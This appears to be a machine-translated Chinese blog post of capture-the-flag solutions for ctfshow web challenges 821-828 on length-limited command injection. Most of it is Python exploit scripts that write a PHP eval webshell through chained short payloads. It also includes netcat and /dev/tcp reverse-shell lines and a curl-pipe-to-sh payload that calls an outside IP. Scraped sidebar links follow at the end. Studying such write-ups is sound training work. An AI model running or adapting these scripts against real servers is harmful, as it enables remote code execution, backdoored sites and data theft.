当前位置:网站首页>Ctfshow common postures (821-830)
Ctfshow common postures (821-830)
2022-06-13 04:31:00 【yu22x】
I am a script Porter in this part .
web821
Take a look at this article https://www.cnblogs.com/-chenxs/p/11981586.html
This limited length can be created by using the command you want to use as the file name , Then write to another file in chronological order ls -t >0
Finally, execute 0 that will do sh 0
Use the group leader to vip Mass script
import requests
import time
url = "http://ddfe46fa-fa05-4675-bb00-537e95a0f936.challenge.ctf.show/"
payload=[
">hp",
">1.p\\",
">d\\>\\",
">\\ -\\",
">e64\\",
">bas\\",
">7\\|\\",
">XSk\\",
">Fsx\\",
">dFV\\",
">kX0\\",
">bCg\\",
">XZh\\",
">AgZ\\",
">waH\\",
">PD9\\",
">o\\ \\",
">ech\\",
"ls -t>0",
". 0"
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"1.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"1.php")
def main():
run()
check()
if __name__ == '__main__':
main()
The contents of the written file are <?php eval($_GET[1]);
web822
web The directory is not writable , So write the file to a temporary file , Then execute the file .
However, there is a way to use this place in the case of non numeric letters .
#coding:utf-8
#author yu22x
import requests
url="http://dbea52c2-0b83-4770-972d-7adde3dc1677.challenge.ctf.show/"
#files={'file':'bash -i >& /dev/tcp/ip/port 0>&1'}
files={
'file':'nc ip port -e /bin/sh'}
r= requests.post(url,files=files,data={
'cmd':'. /t*/*'})
html = r.text
print(html)
bash Bounce is not successful nc rebound .
web 823|824
I have to admire the brains of the leaders
Take a look first payload
payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]
write in grep h
Then perform * > j
What is actually carried out is grep h index.php
Get is index.php All take h The line of , give the result as follows
<?php
# @Author: h1xa
# @Last Modified by: h1xa
# @email: [email protected]
# @link: https://ctfer.com
highlight_file(__FILE__);
shell_exec($cmd);
And then j Add content from to index.php And write to i in cat * >> i*
The final will be i Of copy To index.php in .
However, there are not many applicable cases , The command strip that needs to be finally invoked h perhaps p.
# @Author: h1xa
import requests
import time
url = "http://6763f093-a4c6-48a8-9740-018b234da289.challenge.ctf.show/"
payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(0.3)
print("[*] Attack success!!!Webshell is "+url)
def main():
run()
if __name__ == '__main__':
main()
web825
The principle is similar to 821, However, because the length is short, the same file name will appear , Such as the blank space , There may be several places to use , But only one will be generated .
So you need to change the space to ${IFS}. Finally, there's another question , We used ls -t>0 It's longer than 5 So we have to think of another way .
Here is the use of dir,
dir a b >c Will ab Write to c In file .
The specific principle can be referred to https://www.sohu.com/a/208155480_354899
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:42
# @email: [email protected]
# @link: https://ctfer.com
import requests
import time
url = "http://eb893c73-86c3-449f-98fe-0f82d9212110.challenge.ctf.show/"
payload = [
'>sl',
'>kt-',
'>j\\>',
'>j\\#',
'>dir',
'*>v',
'>rev',
'*v>x',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh x',
'sh j'
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(0.3)
def check():
response = requests.get(url+"a.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"a.php")
def main():
run()
check()
if __name__ == '__main__':
main()
web826
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:58
# @email: [email protected]
# @link: https://ctfer.com
import requests
import time
url = "http://d6373b16-848d-4656-9a30-d1fbb18d8678.challenge.ctf.show/"
#url="http://101.34.94.44/aaa/index.php"
payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
# This place ip Is to use the 10 Base number , Because with ordinary ip Address has more than one dot .
# You can use this website to transfer https://tool.520101.com/wangluo/jinzhizhuanhuan/
'>sh',
'>\\|\\',
'>00\\',
'>80\\',
'>\\:\\',
'>48\\',
'>11\\',
'>75\\',
'>96\\',
'>16\\',
'>\\ \\',
'>rl\\',
'>cu\\',
'sh z',
'sh a',
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"1.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"1.php")
def main():
run()
check()
if __name__ == '__main__':
main()
web827
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:56:17
# @email: [email protected]
# @link: https://ctfer.com
import requests
import time
url = "http://ab1290cc-c3f0-4ff2-b864-a4388d4331a6.challenge.ctf.show/"
payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh z',
'sh a'
]
def writeFile(payload):
data={
"cmd":payload
}
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"a.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"a.php")
def main():
run()
check()
if __name__ == '__main__':
main()
web828
There are ready-made ones on the Internet payloadhttps://juejin.cn/post/7069307571483443231
边栏推荐
- CTFSHOW 常用姿势篇(821-830)
- Hugo 博客搭建教程
- Applet - uniapp realizes the functions of two-dimensional code picture pop-up and picture saving
- Uni app enables pull-up loading and pull-down refresh (pull-down with animation)
- XOR prefix and +map maintenance
- Application of dagger2 learning module (II)
- CTFSHOW SQL注入篇(231-253)
- [sword finger offer] interview question 25 Merge two ordered linked lists
- Answer private message @ Tiantian Wx //2022-6-12 C language 51 single chip microcomputer led analog traffic light
- Checkmarks and crosses to collect
猜你喜欢
随机推荐
电磁兼容常用名词术语
PAT 1054 The Dominant Color
EMC整改纲要
一款開源的Markdown轉富文本編輯器的實現原理剖析
Knife4j aggregation 2.0.9 supports automatic refresh of routing documents
在线音频调节技术汇总
R: Employee turnover forecast practice
Latex operation
Summary of webdriver API for web automated testing
Redis
重读经典:《End-to-End Object Detection with Transformers》
CTFSHOW SQL注入篇(211-230)
Redis
【Flutter 問題系列第 67 篇】在 Flutter 中使用 Get 插件在 Dialog 彈窗中不能二次跳轉路由問題的解决方案
Zoom and move the H5 part of the mobile end
SQL advanced challenge (1 - 5)
Koa file upload and download
Manage PC startup items
Dumi builds a document blog
Introduction to applet Basics (dark horse learning notes)